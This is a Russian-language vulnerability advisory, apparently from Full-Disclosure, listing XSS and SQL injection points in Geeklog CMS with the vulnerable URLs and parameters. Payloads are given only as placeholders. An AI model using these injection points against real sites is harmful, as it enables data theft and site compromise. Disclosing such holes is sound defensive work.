Программа: Geeklog 1.x, 2.x Опасность: Высокая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Geeklog Content Management System. Удаленный атакущий может выполнить XSS и SQL injection нападения. 1. XSS http://[TARGET]/faqman/index.php?op=view&t=518">[XSS ATTACK CODE] http://[TARGET]/filemgmt/brokenfile.php?lid=17'/%22%3[XSS ATTACK CODE] Другие сценарии, использующие переменную lid, могут быть также уязвимы. Также HTML код не фильтруется в shoutbox. 2. SQL инъекция http://[TARGET]/index.php?topic=te'st/[SQL INJECTION CODE] http://[TARGET]/forum/viewtopic.php?forum=1&showtopic=1'0/[SQL INJECTION CODE] http://[TARGET]/staticpages/index.php?page=test'test/[SQL INJECTION CODE] http://[TARGET]/filemgmt/visit.php?lid=1'1'0/[SQL INJECTION CODE] http://[TARGET]/filemgmt/viewcat.php?cid='6/[SQL INJECTION CODE] http://[TARGET]/comment.php?type=filemgmt&cid=filemgmt-1'70/[SQL INJECTION CODE] http://[TARGET]/comment.php?mode=display&sid=filemgmt-XXX&title=[SQL INJECTION CODE] http://[TARGET]/filemgmt/singlefile.php?lid=17'/0/[SQL INJECTION CODE] Уязвимость может использоваться для доступа к привилегированной информации. 3. Приложение не регистрирует заголовок HTTP_X_FORWARDED_FOR. В результате приложение зарегистрирует IP прокси сервера у пользователя, находящегостя позади прокси. URL производителя:http://www.geeklog.net/ Решение: Неофициальное исправление можно найти в источнике сообщения. Фильтруйте злонамеренный ввод в HTTP прокси.

[Full-Disclosure] Geeklog Multiple Versions Vulnerabilities